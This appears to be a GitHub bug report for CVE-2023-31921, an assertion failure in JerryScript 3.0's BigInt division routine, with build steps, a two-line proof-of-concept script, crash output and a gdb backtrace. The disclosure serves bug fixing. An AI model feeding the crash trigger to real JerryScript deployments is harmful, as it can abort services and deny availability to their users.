Headline
CVE-2023-31921: Assertion 'dividend_end_p[0] == divisor_high && dividend_end_p[-1] < divisor_high' failed at /jerryscript/jerry-core/ecma/operations/ecma-big-uint.c(ecma_big_uint_div_mod) · Issue #5068 · jerryscript-
Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the ecma_big_uint_div_mod at jerry-core/ecma/operations/ecma-big-uint.c.
JerryScript revision
Commit: 05dbbd1
Version: v3.0.0
Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
Build steps
python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20
Test case
// poc.js
var x = BigInt ( 8 ** 16 + 1 ) ;
x ** BigInt ( 4 ) / x;
Execution steps & Output
$ ./jerryscript/build/bin/jerry poc.js ICE: Assertion ‘dividend_end_p[0] == divisor_high && dividend_end_p[-1] < divisor_high’ failed at /jerryscript/jerry-core/ecma/operations/ecma-big-uint.c(ecma_big_uint_div_mod):1119. Error: JERRY_FATAL_FAILED_ASSERTION Aborted
Backtrace
(gdb) #0 0xf7efdd99 in __kernel_vsyscall ()
#1 0xf7bd2276 in raise () from /lib32/libc.so.6
#2 0xf7bba3f7 in abort () from /lib32/libc.so.6
#3 0x083ecca3 in jerry_port_fatal (code=JERRY_FATAL_FAILED_ASSERTION)
at /jerryscript/jerry-port/common/jerry-port-process.c:29
#4 0x08260d02 in jerry_fatal (code=JERRY_FATAL_FAILED_ASSERTION)
at /jerryscript/jerry-core/jrt/jrt-fatals.c:63
#5 0x08260d64 in jerry_assert_fail (
assertion=0x846e200 <str> "dividend_end_p[0] == divisor_high && dividend_end_p[-1] < divisor_high",
file=0x846d800 <str> "/jerryscript/jerry-core/ecma/operations/ecma-big-uint.c",
function=0x846e080 <__func__.ecma_big_uint_div_mod> "ecma_big_uint_div_mod", line=1119)
at /jerryscript/jerry-core/jrt/jrt-fatals.c:83
#6 0x08380b54 in ecma_big_uint_div_mod (dividend_value_p=0xf4203c40,
divisor_value_p=0xf5600630, is_mod=<optimized out>)
at /jerryscript/jerry-core/ecma/operations/ecma-big-uint.c:1119
#7 0x081dfc96 in ecma_bigint_div_mod (left_value=4095753286,
right_value=4116710966, is_mod=<optimized out>)
at /jerryscript/jerry-core/ecma/operations/ecma-bigint.c:1337
#8 0x082be8b9 in do_number_arithmetic (op=<optimized out>,
left_value=<optimized out>, right_value=<optimized out>)
at /jerryscript/jerry-core/vm/opcodes-ecma-arithmetics.c:148
#9 0x082dd6f0 in vm_loop (frame_ctx_p=0xffdc12c0)
at /jerryscript/jerry-core/vm/vm.c:3563
#10 0x082d6b83 in vm_execute (frame_ctx_p=0xffdc12c0)
at /jerryscript/jerry-core/vm/vm.c:5211
#11 0x082d4f62 in vm_run (shared_p=0xffdc13d0, this_binding_value=4118822019,
lex_env_p=0xf56007b0)
at /jerryscript/jerry-core/vm/vm.c:5312
#12 0x082d4c39 in vm_run_global (bytecode_p=<optimized out>,
function_object_p=<optimized out>)
at /jerryscript/jerry-core/vm/vm.c:286
#13 0x0812a4e5 in jerry_run (script=4114614595)
at /jerryscript/jerry-core/api/jerryscript.c:548
#14 0x083eac3f in jerryx_source_exec_script (
path_p=0xffdc21e7 "poc.js")
at /jerryscript/jerry-ext/util/sources.c:68
#15 0x0812162d in main (argc=<optimized out>, argv=<optimized out>)
at /jerryscript/jerry-main/main-desktop.c:156
(gdb) quit
credits: @EJueon, @Ye0nny of the seclab-yonsei.